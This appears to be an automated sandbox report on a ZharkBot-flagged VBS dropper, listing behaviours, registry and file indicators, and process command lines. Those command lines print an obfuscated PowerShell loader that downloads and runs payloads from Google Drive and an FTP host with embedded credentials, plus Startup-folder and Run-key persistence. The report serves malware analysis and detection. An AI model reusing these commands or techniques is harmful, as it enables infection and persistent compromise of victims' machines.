Analysis Overview
SHA256
596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23
Threat Level: Known bad
The file AT000005112563923.vbs was found to be: Known bad.
Malicious Activity Summary
ZharkBot
Detects ZharkBot payload
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Indicator Removal: File Deletion
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-19 11:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-19 11:24
Reported
2024-09-19 11:26
Platform
win7-20240708-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AT000005112563923.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AT000005112563923.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File opened for modification | C:\Windows\Logs\DPX\setupact.log | C:\Windows\system32\wusa.exe | N/A |
| File opened for modification | C:\Windows\Logs\DPX\setuperr.log | C:\Windows\system32\wusa.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革DEЌз革ZQB1Ќз革HIЌз革dЌз革Ќз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革aЌз革B0Ќз革HQЌз革cЌз革BzЌз革DoЌз革LwЌз革vЌз革G0Ќз革ZQBoЌз革HIЌз革ZQBlЌз革G4Ќз革YwByЌз革GUЌз革YQB0Ќз革GkЌз革bwBuЌз革C4Ќз革YwBvЌз革G0Ќз革LwBpЌз革G4Ќз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HIЌз革dwBjЌз革GwЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAARgBkAE0AUQBUACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAARgBkAE0AUQBUACQAIAA7AA==';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs');powershell $IedxR
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lcwr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $lcwr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lcwr.dispose();$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $lcwr.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ni/moc.noitaercneerhem//:sptth' , $hzwje , 'true1' ) );};"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
C:\Windows\system32\wusa.exe
"C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
Network
Files
memory/2440-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp
memory/2440-5-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/2440-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 742bacb4eca96696026953673a08ec17 |
| SHA1 | 601aa9e4a9d67c6d9c654b215c46c740e1b9eae1 |
| SHA256 | 43aecfd8f08df366cce2cac95315f682db10ab19023bfaa7a6d61e60aa4b08d5 |
| SHA512 | 78818d0d19c339edf1255060f5fe92ddc755a71c1651a391937a672646fa906b9f5029ac3c383b9be5575523673a63feec77e3335f3b8d48d5d08022c247ee4a |
memory/2440-13-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2440-12-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2440-26-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
memory/2440-27-0x000007FEF573E000-0x000007FEF573F000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-19 11:24
Reported
2024-09-19 11:26
Platform
win10v2004-20240802-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZharkBot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_q = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\iocpf.ps1' \";exit" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1592 set thread context of 4188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
